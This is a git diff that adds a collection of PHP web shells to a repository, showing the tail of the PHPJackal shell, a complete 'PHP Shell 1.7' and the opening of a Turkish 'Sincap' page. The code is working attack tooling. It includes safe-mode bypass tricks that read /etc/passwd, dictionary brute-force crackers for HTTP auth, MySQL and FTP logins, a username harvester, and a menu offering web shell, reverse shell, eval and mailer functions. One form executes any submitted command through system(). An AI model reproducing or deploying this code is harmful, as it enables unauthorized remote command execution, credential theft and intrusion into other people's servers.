+while(!feof($ser))echo fgets($ser);
+echo "</pre>";
+fclose($ser);
+}
+else{
+echo "<center>${t}Whois:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['server'])) echo htmlspecialchars($_REQUEST['server']);else echo "whois.geektools.com"; echo "\" name=server size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">domain:</td><td bgcolor=\"#808080\"><input type=text name=domain value=\"";if (!empty($_REQUEST['domain'])) echo htmlspecialchars($_REQUEST['domain']); else echo "google.com"; echo  "\" size=35></td><tr><td bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=\"Do\"></td></tr></form></table></center>";
+}
+}
+function hexvieW(){
+if (!empty($_REQUEST['filE'])){
+$f = $_REQUEST['filE'];
+echo "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\"><td width=\"10%\" bgcolor=\"#282828\">Offset</td><td width=\"25%\" bgcolor=\"#282828\">Hex</td><td width=\"25%\" bgcolor=\"#282828\"></td><td width=\"40%\" bgcolor=\"#282828\">ASCII</td></tr>";
+$file = fopen($f,"r");
+$i= -1;
+while (!feof($file)) {
+$ln='';
+$i++;
+echo "<tr><td width=\"10%\" bgcolor=\"#";
+if ($i % 2==0) echo "666666";else echo "808080";
+echo "\">";echo str_repeat("0",(8-strlen($i * 16))).$i * 16;echo "</td>";
+echo "<td width=\"25%\" bgcolor=\"#";
+if ($i % 2==0) echo "666666";else echo "808080"; 
+echo "\">";
+for ($j=0;$j<=7;$j++){
+if (!feof($file)){
+$tmp = strtoupper(dechex(ord(fgetc($file))));
+if (strlen($tmp)==1) $tmp = "0".$tmp;
+echo $tmp." ";
+$ln.=$tmp;
+}
+}
+echo "</td><td width=\"25%\" bgcolor=\"#";
+if ($i % 2==0) echo "666666";else echo "808080"; 
+echo "\">";
+for ($j=7;$j<=14;$j++){
+if (!feof($file)){
+$tmp = strtoupper(dechex(ord(fgetc($file))));
+if (strlen($tmp)==1) $tmp = "0".$tmp;
+echo $tmp." ";
+$ln.=$tmp;
+}
+}
+echo "</td><td width=\"40%\" bgcolor=\"#";
+if ($i % 2==0) echo "666666";else echo "808080";
+echo "\">";
+$n=0;$asc="";$co=0;
+for ($k=0;$k<=16;$k++){
+$co=hexdec(substr($ln,$n,2));
+if (($co<=31)||(($co>=127)&&($co<=160)))$co=46;
+$asc.= chr($co);
+$n+=2;
+}
+echo htmlspecialchars($asc);
+echo "</td></tr>";
+}
+}
+fclose($file);
+echo "</table>";
+}
+function safemodE(){
+global $windows,$t,$hcwd;
+if (!empty($_REQUEST['file'])){
+$i=1;
+echo "<pre>\n<font color=green>Method $i:(ini_restore)</font><font color=blue>\n";
+ini_restore("safe_mode");ini_restore("open_basedir");
+$tmp = file_get_contents($_REQUEST['file']);
+echo $tmp;
+$i++;
+echo "\n</font><font color=green>Method $i:(copy)</font><font color=blue>\n";
+$tmp=tempnam("","cx");
+copy("compress.zlib://".$_REQUEST['file'], $tmp);
+$fh = fopen($tmp, "r");
+$data = fread($fh, filesize($tmp));
+fclose($fh);
+echo $data;
+$i++;
+if(function_exists("curl_init")){
+echo "\n</font><font color=green>Method $i:(curl_init)[A]</font><font color=blue>\n";
+$fh = @curl_init("file://".$_REQUEST['file']."");
+$tmp = @curl_exec($fh);
+echo $tmp;
+$i++;
+echo "\n</font><font color=green>Method $i:(curl_init)[B]</font><font color=blue>\n";
+$i++;
+if(strstr($_REQUEST['file'],DIRECTORY_SEPARATOR))
+$ch =curl_init("file:///".$_REQUEST['file']."\x00/../../../../../../../../../../../../".__FILE__);
+else $ch = curl_init("file://".$_REQUEST['file']."\x00".__FILE__);
+curl_exec($ch);
+var_dump(curl_exec($ch));
+}
+if($_REQUEST['file'] == "/etc/passwd"){
+echo "\n</font><font color=green>Method $i:(posix)</font><font color=blue>\n";
+for($uid=0;$uid<99999;$uid++){
+$h=posix_getpwuid($uid);
+if (!empty($h))foreach($h as $v)echo "$v:";}}
+$i++;
+echo "</pre></font>";
+}
+echo "<center>${t}Anti Safe-Mode:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">File:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['file'])) echo htmlspecialchars($_REQUEST['file']);elseif(!$windows) echo "/etc/passwd"; echo "\" name=file size=35></td></tr><tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=\"Read\"></td></tr></form></table></center>";
+}
+function crackeR(){
+global $et;
+$cwd = getcwd();
+echo "<center><table border=0 bgcolor=#333333><tr><td><a href=\"".hlinK("seC=hc&workingdiR=$cwd")."\">[Hash]</a> - <a href=\"".hlinK("seC=smtp&workingdiR=$cwd")."\">[SMTP]</a> - <a href=\"".hlinK("seC=pop3&workingdiR=$cwd")."\">[POP3]</a> - <a href=\"".hlinK("seC=imap&workingdiR=$cwd")."\">[IMAP]</a> - <a href=\"".hlinK("seC=ftp&workingdiR=$cwd")."\">[FTP]</a> - <a href=\"".hlinK("seC=snmp&workingdiR=$cwd")."\">[SNMP]</a> - <a href=\"".hlinK("seC=sql&workingdiR=$cwd")."\">[MySQL]</a> - <a href=\"".hlinK("seC=fcr&workingdiR=$cwd")."\">[HTTP form]</a> - <a href=\"".hlinK("seC=auth&workingdiR=$cwd")."\">[HTTP Auth(basic)]</a> - <a href=\"".hlinK("seC=dic&workingdiR=$cwd")."\">[Dictionary maker]</a>$et</center>";
+}
+function dicmakeR(){
+global $errorbox,$windows,$footer,$t,$et,$hcwd;
+if (!empty($_REQUEST['combo'])&&($_REQUEST['combo']==1)) $combo=1 ; else $combo=0;
+if (!empty($_REQUEST['range']) && !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])){
+$min = $_REQUEST['min'];
+$max = $_REQUEST['max'];
+if($max<$min)die($errorbox ."Bad input!$et". $footer);
+$s =$w="";
+$out = $_REQUEST['output'];
+$r = ($_REQUEST['range']=='a' )?'a':'A';
+if ($_REQUEST['range']==0) $r=0;
+for($i=0;$i<$min;$i++) $s.=$r;
+$dic = fopen($out,'a');
+if(is_nan($r)){
+while(strlen($s)<=$max){
+$w = $s;
+if($combo)$w="$w:$w";
+fwrite($dic,$w."\n");
+$s++;}
+}
+else{
+while(strlen($w)<=$max){
+$w =(string)str_repeat("0",($min - strlen($s))).$s;
+if($combo)$w="$w:$w";
+fwrite($dic,$w."\n");
+$s++;}
+}
+fclose($dic);
+echo "<font color=blue>Done</font>";
+}
+if (!empty($_REQUEST['input']) && !empty($_REQUEST['output'])){
+$input=fopen($_REQUEST['input'],'r');
+if (!$input){
+if ($windows)echo $errorbox. "Unable to read from ".htmlspecialchars($_REQUEST['input']) ."$et<br>";
+else{
+$input=explode("\n",shelL("cat $input"));
+$output=fopen($_REQUEST['output'],'w');
+if ($output){
+foreach ($input as $in){
+$user = $in;
+$user = trim(fgets($in)," \n\r");
+if (!strstr($user,":"))continue;
+$user=substr($user,0,(strpos($user,':')));
+if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n");
+}
+fclose($input);fclose($output);
+echo "<font color=blue>Done</font>";
+}
+}
+}
+else{
+$output=fopen($_REQUEST['output'],'w');
+if ($output){
+while (!feof($input)){
+$user = trim(fgets($input)," \n\r");
+if (!strstr($user,":"))continue;
+$user=substr($user,0,(strpos($user,':')));
+if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n");
+}
+fclose($input);fclose($output);
+echo "<font color=blue>Done</font>";
+}
+else echo $errorbox." Unable to write data to ".htmlspecialchars($_REQUEST['input']) ."$et<br>";
+}
+}elseif (!empty($_REQUEST['url']) && !empty($_REQUEST['output'])){
+$res=downloadiT($_REQUEST['url'],$_REQUEST['output']);
+if($combo && $res){
+$file=file($_REQUEST['output']);
+$output=fopen($_REQUEST['output'],'w');
+foreach ($file as $v)fwrite($output,"$v:$v\n");
+fclose($output);
+}
+echo "<font color=blue>Done</font>";
+}else{
+$temp=whereistmP();
+echo "<center>${t}Wordlist generator:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Range:</td><td bgcolor=\"#666666\"><select name=range><option value=a>a-z</option><option value=Z>A-Z</option><option value=0>0-9</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Min lenght:</td><td bgcolor=\"#808080\"><select name=min><option value=1>1</option><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8>8</option><option value=9>9</option><option value=10>10</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Max lenght:</td><td bgcolor=\"#666666\"><select name=max><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8 selected>8</option><option value=9>9</option><option value=10>10</option><option value=11>11</option><option value=12>12</option><option value=13>13</option><option value=14>14</option><option value=15>15</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox name=combo style=\"border-width:1px;background-color:#666666;\" value=1 checked>Combo style output</td></tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Make></td></tr></form></table><br>${t}Grab dictionary:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Grab from:</td><td bgcolor=\"#666666\"><input type=text value=\"/etc/passwd\" name=input size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Grab></td></tr></form></table><br>${t}Download dictionary:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">URL:</td><td bgcolor=\"#666666\"><input type=text value=\"http://vburton.ncsa.uiuc.edu/wordlist.txt\" name=url size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr><tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Get></td></tr></form></table></center>";}
+}
+function calC(){
+global $t,$et,$hcwd;
+$fu = array('-','md5','sha1','crc32','hex','ip2long','long2ip','base64_encode','base64_decode','urldecode','urlencode');
+if (!empty($_REQUEST['input']) && (in_array($_REQUEST['to'],$fu))){
+echo "<center>${t}Output:<br><textarea rows=\"10\" cols=\"64\">";
+if($_REQUEST['to']!='hex')echo $_REQUEST['to']($_REQUEST['input']);else for($i=0;$i<strlen($_REQUEST['input']);$i++)echo strtoupper(dechex(ord($_REQUEST['input']{$i})));
+echo "</textarea>$et</center><br>";
+}
+echo "<center>${t}Convertor:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Input:</td><td bgcolor=\"#666666\"><textarea rows=\"10\" name=\"input\" cols=\"64\">";if(!empty($_REQUEST['input']))echo htmlspecialchars($_REQUEST['input']);echo "</textarea></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Task:</td><td bgcolor=\"#808080\"><select size=1 name=to><option value=md5>MD5</option><option value=sha1>SHA1</option><option value=crc32>crc32</option><option value=ip2long>IP to long</option><option value=long2ip>Long to IP</option><option value=hex>HEX</option><option value=urlencode>URL encoding</option><option value=urldecode>URL decoding</option><option value=base64_encode>Base64 encoding</option><option value=base64_decode>Base64 decoding</option></select></td><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Convert></td></tr>$hcwd</form></table></center>";
+}
+function authcrackeR(){
+global $errorbox,$et,$t,$crack,$hcwd;
+if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
+$data='';
+$method=($_REQUEST['method'])?'POST':'GET';
+if(strstr($_REQUEST['target'],'?')){$data=substr($_REQUEST['target'],strpos($_REQUEST['target'],'?')+1);$_REQUEST['target']=substr($_REQUEST['target'],0,strpos($_REQUEST['target'],'?'));}
+spliturL($_REQUEST['target'],$host,$page);
+$type=$_REQUEST['combo'];
+$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
+if($method='GET')$page.=$data;
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+echo "<font color=blue>";
+while(!feof($dictionary)){
+if($type){
+$combo=trim(fgets($dictionary)," \n\r");
+$user=substr($combo,0,strpos($combo,':'));
+$pass=substr($combo,strpos($combo,':')+1);
+}else{
+$pass=trim(fgets($dictionary)," \n\r");
+}
+$so=fsockopen($host,80,$en,$es,5);
+if(!$so){echo "$errorbox Can not connect to host$et";break;}
+else{
+$packet="$method /$page HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nConnection: Close\r\nAuthorization: Basic ".base64_encode("$user:$pass");
+if($method=='POST')$packet.="Content-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data);
+$packet.="\r\n\r\n";
+$packet.=$data;
+fputs($so,$packet);
+$res=substr(fgets($so),9,2);
+fclose($so);
+if($res=='20')echo "U: $user P: $pass</br>";
+flusheR();
+}
+}
+echo "Done!</font>";
+}else echo "<center><form method=\"POST\" name=form>${t}HTTP Auth cracker:</td><td bgcolor=\"#333333\"><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>";
+}
+function sqlcrackeR(){
+global $errorbox,$t,$et,$crack;
+if (!function_exists("mysql_connect")){
+echo "$errorbox Server does n`t support MySQL$et";
+}
+else{
+if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
+$target=$_REQUEST['target'];
+$type=$_REQUEST['combo'];
+$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+if ($dictionary){
+echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";
+while(!feof($dictionary)){
+if($type){
+$combo=trim(fgets($dictionary)," \n\r");
+$user=substr($combo,0,strpos($combo,':'));
+$pass=substr($combo,strpos($combo,':')+1);
+}else{
+$pass=trim(fgets($dictionary)," \n\r");
+}
+$sql=@mysql_connect($target,$user,$pass);
+if($sql){echo "U: $user P: $pass (<a href=\"".hlinK("seC=mysql&serveR=$target&useR=$user&pasS=$pass&querY=SHOW+DATABASES&workingdiR=".getcwd())."\">Connect</a>)<br>";mysql_close($sql);if(!$type)break;}
+flusheR();
+}
+echo "<br>Done</font>";
+fclose($dictionary);
+}
+else{
+echo "$errorbox Can not open dictionary.$et";
+}
+}
+else{
+echo "<center>${t}MySQL cracker:$crack";
+}
+}
+}
+function ftpcrackeR(){
+global $errorbox,$t,$et,$crack;
+if (!function_exists("ftp_connect"))echo "$errorbox Server does n`t support FTP functions$et";
+else{
+if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
+$target=$_REQUEST['target'];
+$type=$_REQUEST['combo'];
+$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+if ($dictionary){
+echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";
+while(!feof($dictionary)){
+if($type){
+$combo=trim(fgets($dictionary)," \n\r");
+$user=substr($combo,0,strpos($combo,':'));
+$pass=substr($combo,strpos($combo,':')+1);
+}else{
+$pass=trim(fgets($dictionary)," \n\r");
+}
+if(!$ftp=ftp_connect($target,21,8)){echo "$errorbox Can not connect to server.$et";break;}
+if (@ftp_login($ftp,$user,$pass)){echo "U: $user P: $pass<br>";if(!$type)break;}
+ftp_close($ftp);
+flusheR();
+}
+echo "<br>Done</font>";
+fclose($dictionary);
+}
+else{
+echo "$errorbox Can not open dictionary.$et";
+}
+}
+else echo "<center>${t}FTP cracker:$crack";
+}}
+function openiT($name){
+$ext=strtolower(substr($name,strrpos($name,'.')+1));
+$src=array('php','php3','php4','phps','phtml','phtm','inc');
+if(in_array($ext,$src))highlight_file($name);
+else echo "<font color=blue><pre>".htmlspecialchars(file_get_contents($name))."</pre></font>";
+}
+function logouT(){
+setcookie('passw','',time()-10000);
+header('Location: '.hlinK());
+}
+?>
+<html>
+<head>
+<style>body{scrollbar-base-color: #484848; scrollbar-arrow-color: #FFFFFF; scrollbar-track-color: #969696;font-size:16px;font-family:"Arial Narrow";}Table { font-size: 15px; } .buttons{font-family:Verdana;font-size:10pt;font-weight:normal;font-style:normal;color:#FFFFFF;background-color:#555555;border-style:solid;border-width:1px;border-color:#FFFFFF;}textarea{border: 0px #000000 solid;background: #EEEEEE;color: #000000;}input{background: #EEEEEE;border-width:1px;border-style:solid;border-color:black}select{background: #EEEEEE; border: 0px #000000 none;}</style>
+<meta http-equiv="Content-Language" content="en-us">
+<title>PHPJackal</title>
+</head><body text="#E2E2E2" bgcolor="#C0C0C0" link="#DCDCDC" vlink="#DCDCDC" alink="#DCDCDC">
+<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#282828" bgcolor="#333333" width="100%">
+<tr><td><a href=javascript:history.back(1)>[Back]</a> - <a href="<?php $cwd= getcwd(); echo hlinK("seC=sysinfo&workingdiR=$cwd");?>">[Info]</a> - <a href="<?php echo hlinK("seC=fm&workingdiR=$cwd");?>">[File manager]</a> - <a href="<?php echo hlinK("seC=edit&workingdiR=$cwd");?>">[Editor]</a> - <a href="<?php echo hlinK("seC=webshell&workingdiR=$cwd");?>">[Web shell]</a> - <a href="<?php echo hlinK("seC=br&workingdiR=$cwd");?>">[B/R shell]</a> - <a href="<?php echo hlinK("seC=asm&workingdiR=$cwd");?>">[Safe-mode]</a> - <a href="<?php echo hlinK("seC=mysql&workingdiR=$cwd"); ?>">[SQL]</a> - <a href="<?php echo hlinK("seC=mailer&workingdiR=$cwd"); ?>">[Mailer]</a> - <a href="<?php echo hlinK("seC=eval&workingdiR=$cwd");?>">[Evaler]</a> - <a href="<?php echo hlinK("seC=sc&workingdiR=$cwd"); ?>">[Scanners]</a> - <a href="<?php echo hlinK("seC=cr&workingdiR=$cwd");?>">[Crackers]</a> - <a href="<?php echo hlinK("seC=px&workingdiR=$cwd");?>">[Pr0xy]</a> - <a href="<?php echo hlinK("seC=whois&workingdiR=$cwd");?>">[Whois]</a> - <a href="<?php echo hlinK("seC=calc&workingdiR=$cwd");?>">[Convert]</a> - <a href="<?php echo hlinK("seC=about&workingdiR=$cwd");?>">[About]</a> <?php if(isset($_COOKIE['passw'])) echo "- [<a href=\"".hlinK("seC=logout")."\">Logout</a>]";?></td></tr></table>
+<hr size=1 noshade>
+<?php
+if (!empty($_REQUEST['seC'])){
+switch($_REQUEST['seC']){
+case 'fm':filemanager();break;
+case 'sc':scanneR();break;
+case 'phpinfo': phpinfo();break;
+case 'edit': if (!empty($_REQUEST['open']))editoR($_REQUEST['filE']);
+if (!empty($_REQUEST['Save'])){
+$filehandle= fopen($_REQUEST['file'],"w");
+fwrite($filehandle,$_REQUEST['edited']);
+fclose($filehandle);}
+if (!empty($_REQUEST['filE'])) editoR($_REQUEST['filE']);else editoR('');
+break;
+case 'openit':openiT($_REQUEST['namE']);break;
+case 'cr': crackeR();break;
+case 'dic':dicmakeR();break;
+case 'whois':whoiS();break;
+case 'hex':hexvieW();break;
+case 'img':showimagE($_REQUEST['filE']);break;
+case 'inc':include ($_REQUEST['filE']);break;
+case 'hc':hashcrackeR();break;
+case 'fcr':formcrackeR();break;
+case 'snmp':snmpcrackeR();break;
+case 'sql':sqlcrackeR();break;
+case 'auth':authcrackeR();break;
+case 'pop3':pop3crackeR();break;
+case 'imap':imapcrackeR();break;
+case 'smtp':smtpcrackeR();break;
+case 'ftp':ftpcrackeR();break;
+case 'eval':phpevaL();break;
+case 'px':pr0xy();break;
+case 'webshell':webshelL();break;
+case 'mailer':maileR();break;
+case 'br':brshelL();break;
+case 'asm':safemodE();break;
+case 'mysql':mysqlclienT();break;
+case 'calc':calC();break;
+case 'sysinfo':sysinfO();break;
+case 'checksum':checksuM($_REQUEST['filE']);break;
+case 'logout':logouT();break;
+default: echo $intro;
+}}else echo $intro;
+echo $footer;?></body></html>
\ No newline at end of file
diff --git a/xakep-shells/PHP/phpshell17.php.txt b/xakep-shells/PHP/phpshell17.php.txt
new file mode 100644
index 0000000..d488436
--- /dev/null
+++ b/xakep-shells/PHP/phpshell17.php.txt
@@ -0,0 +1,177 @@
+<?php
+
+define(´PHPSHELL_VERSION´, ´1.7´);
+
+/*
+
+**************************************************************
+* PHP Shell *
+**************************************************************
+$Id: phpshell.php,v 1.18 2002/09/18 15:49:54 gimpster Exp $
+
+PHP Shell is aninteractive PHP-page that will execute any command
+entered. See the files README and INSTALL or http://www.gimpster.com
+for further information.
+
+Copyright (C) 2000-2002 Martin Geisler < gimpster@gimpster.com>
+
+This program is free software; you can redistribute it and/or
+modify it under the terms of the GNU General Public License
+as published by the Free Software Foundation; either version 2
+of the License, or (at your option) any later version.
+
+This program is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+GNU General Public License for more details.
+
+You can get a copy of the GNU General Public License from this
+address: http://www.gnu.org/copyleft/gpl.html#SEC1
+You can also write to the Free Software Foundation, Inc., 59 Temple
+Place - Suite 330, Boston, MA 02111-1307, USA.
+
+*/
+?>
+
+<html>
+<head>
+<title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]<?php echo PHPSHELL_VERSION ?></title>
+</head>
+<body>
+<h1>[YOUR HEADER[ <?php echo PHPSHELL_VERSION ?> [ADITTIONAL TEXT] -
+[ADDITIONAL TEXT]</h1><br><hr><marquee><b>[ADDITIONAL MESSEGE OR TEXT]</b></marquee><hr><br>
+
+<?php
+
+if (ini_get(´register_globals´) != ´1´) {
+/* We´ll register the variables as globals: */
+if (!empty($HTTP_POST_VARS))
+extract($HTTP_POST_VARS);
+
+if (!empty($HTTP_GET_VARS))
+extract($HTTP_GET_VARS);
+
+if (!empty($HTTP_SERVER_VARS))
+extract($HTTP_SERVER_VARS);
+}
+
+/* First we check if there has been asked for a working directory. */
+if (!empty($work_dir)) {
+/* A workdir has been asked for */
+if (!empty($command)) {
+if (ereg(´^[[:blank:]]*cd[[:blank:]]+([^;]+)$´, $command, $regs)) {
+/* We try and match a cd command. */
+if ($regs[1][0] == ´/´) {
+$new_dir = $regs[1]; // ´cd /something/...´
+} else {
+$new_dir = $work_dir . ´/´ . $regs[1]; // ´cd somedir/...´
+}
+if (file_exists($new_dir) && is_dir($new_dir)) {
+$work_dir = $new_dir;
+}
+unset($command);
+}
+}
+}
+
+if (file_exists($work_dir) && is_dir($work_dir)) {
+/* We change directory to that dir: */
+chdir($work_dir);
+}
+
+/* We now update $work_dir to avoid things like ´/foo/../bar´: */
+$work_dir = exec(´pwd´);
+
+?>
+
+<form name="myform" action="<?php echo $PHP_SELF ?>" method="post">
+<p>Current working directory: <b>
+<?php
+
+$work_dir_splitted = explode(´/´, substr($work_dir, 1));
+
+echo ´<a xhref="´ . $PHP_SELF . ´?work_dir=/">Root</a>/´;
+
+if (!empty($work_dir_splitted[0])) {
+$path = ´´;
+for ($i = 0; $i < count($work_dir_splitted); $i++) {
+$path .= ´/´ . $work_dir_splitted[$i];
+printf(´<a xhref="%s?work_dir=%s">%s</a>/´,
+$PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
+}
+}
+
+?></b></p>
+<p>Choose new working directory:
+<select name="work_dir" onChange="this.form.submit()">
+<?php
+/* Now we make a list of the directories. */
+$dir_handle = opendir($work_dir);
+/* Run through all the files and directories to find the dirs. */
+while ($dir = readdir($dir_handle)) {
+if (is_dir($dir)) {
+if ($dir == ´.´) {
+echo "<option value="$work_dir" selected>Current Directory</option> ";
+} elseif ($dir == ´..´) {
+/* We have found the parent dir. We must be carefull if the parent
+directory is the root directory (/). */
+if (strlen($work_dir) == 1) {
+/* work_dir is only 1 charecter - it can only be / There´s no
+parent directory then. */
+} elseif (strrpos($work_dir, ´/´) == 0) {
+/* The last / in work_dir were the first charecter.
+This means that we have a top-level directory
+eg. /bin or /home etc... */
+echo "<option value="/">Parent Directory</option> ";
+} else {
+/* We do a little bit of string-manipulation to find the parent
+directory... Trust me - it works :-) */
+echo "<option value="". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."">Parent Directory</option> ";
+}
+} else {
+if ($work_dir == ´/´) {
+echo "<option value="$work_dir$dir">$dir</option> ";
+} else {
+echo "<option value="$work_dir/$dir">$dir</option> ";
+}
+}
+}
+}
+closedir($dir_handle);
+
+?>
+
+</select></p>
+
+<p>Command: <input type="text" name="command" size="60">
+<input name="submit_btn" type="submit" value="Execute Command"></p>
+
+<p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"></p>
+<textarea cols="80" rows="20" readonly>
+
+<?php
+if (!empty($command)) {
+if ($stderr) {
+$tmpfile = tempnam(´/tmp´, ´phpshell´);
+$command .= " 1> $tmpfile 2>&1; " .
+"cat $tmpfile; rm $tmpfile";
+} else if ($command == ´ls´) {
+/* ls looks much better with ´ -F´, IMHO. */
+$command .= ´ -F´;
+}
+system($command);
+}
+?>
+
+</textarea>
+</form>
+
+<script language="JavaScript" type="text/javascript">
+document.forms[0].command.focus();
+</script>
+
+<hr>
+<i>Copyright © 2004–2005, <a
+href="mailto: [YOU CAN ENTER YOUR MAIL HERE]- [ADDITIONAL TEXT]</a></i>
+</body>
+</html>
\ No newline at end of file
diff --git a/xakep-shells/PHP/phvayv.php.php.txt b/xakep-shells/PHP/phvayv.php.php.txt
new file mode 100644
index 0000000..96ff07a
--- /dev/null
+++ b/xakep-shells/PHP/phvayv.php.php.txt
@@ -0,0 +1,124 @@
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="tr">
+<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>:: AventGrup ::.. - Sincap 1.0 | Session(Oturum) Böceði&nbsp;&nbsp; </title>
+</head>
+
+<body text="#008000" bgcolor="#808080" topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0" marginwidth="0" marginheight="0">
+
+<table border="0" width="100%" id="table1" cellspacing="0" cellpadding="0" height="108">
+	<tr>
+    <td width="70" bgcolor="#000000" height="83">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="83" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    Sincap 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="83" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    <br>
+    </font><br>
+    <font color="#858585" face="Verdana" style="font-size: 8pt">www.aventgrup.net&nbsp;<br>
+    </font></span><a href="mailto:shopen@aventgrup.net">
+	<font face="Verdana" style="font-size: 8pt; text-decoration: none" color="#C0C0C0">
+	info@aventgrup.net</font></a><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  	</tr>
+	<tr>
+    <td width="1002" bgcolor="#484848" height="25" colspan="3">
+    <font color="#E5E5E5" style="font-size: 8pt; font-weight: 700" face="Arial">&nbsp; 
+	Linux Sessin ( Oturum ) Böceði</font></td>
+    </tr>
+</table>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#800000" width="100%" id="AutoNumber1">
+  <tr>
+    <td width="8%" bgcolor="#B6B6B6">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#000000">&nbsp;S. 
+    No</font></td>
+    <td width="25%" bgcolor="#B6B6B6">
